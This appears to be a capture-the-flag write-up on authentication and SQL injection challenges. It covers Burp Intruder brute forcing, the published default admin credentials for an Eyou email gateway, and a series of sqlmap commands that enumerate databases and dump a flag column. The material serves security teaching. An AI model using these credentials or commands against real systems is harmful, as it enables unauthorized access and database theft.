Authentication Vulnerabilities

Exploiting Weak Credentials

The first challenge involves bypassing authentication through brute force techniques. The objective is to identify valid credentials by testing common passwords against a target login interface.

To execute this attack, an interception proxy like Burp Suite is essential. Capture the initial login request and forward it to the Intruder module. Within the "Positions" tab, the application automatically identifies the parameters requiring modification (typically the password field). Configure the payload settings by loading a dictionary file containing a list of frequently used passwords. Initiating the attack sends multiple requests, analyzing server responses to determine the correct credential.

Default Vendor Credentials

When brute forcing fails, systems often rely on factory-default usernames and passwords. This challenge specifically targets the email gateway produced by Beijing Eyou Information Technology Co., Ltd. Researching public documentation reveals the standard administrative access for this vendor.

Using the discovered default credentials allows immediate access to the system.

Username: eyougw
Password: admin@(eyou)

Upon successful login, the capture flag is retrieved.

SQL Injection Techniques

SQL Injection (SQLi) vulnerabilities allow attackers to interfere with the queries an application makes to its database. The following sections demonstrate how to exploit various types of SQLi using automated tools like sqlmap.

Integer-Based Injection

This type occurs when unsanitized user input is directly inserted into a numeric database query. The exploitation process involves enumerating the database structure to extract sensitive data.

We start by identifying the available databases using the target URL:

sqlmap --url="http://target-host:10080/?id=1" --dbs

Once the database name (e.g., sqli) is identified, we list its tables:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" --tables

Next, we examine the columns within the target table:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" --columns

Finally, we dump the contents of the specific column to retrieve the flag:

sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" -C "flag" --dump

String-Based Injection

String-based injection is similar to the integer type but involves payloads enclosed in quotes. The methodology for data extraction remains consistent.

sqlmap --url="http://target-host:10080/?id=1" --dbs
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" --tables
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" --columns
sqlmap --url="http://target-host:10080/?id=1" -D "sqli" -T "flag" -C "flag" --dump

Blind Injection Techniques

In scenarios where the application does not return database errors or data directly, blind injection techniques are employed.

Error-Based Injection: Although the application suppresses error messages, sqlmap can still infer data by analyzing the HTTP responses or errer behavior patterns.

Boolean Blind Injection: The application responds different based on the truth of a SQL query (e.g., different content length or status code). While the extraction process is identical to standard injection, it may take longer as the tool must query the database bit by bit.

Time-Based Blind Injection: When there is no visible difference in response content, the attack relies on inducing time delays. The database is forced to wait for a specific period if the query condition is true. This method is generally slower than Boolean blind injection.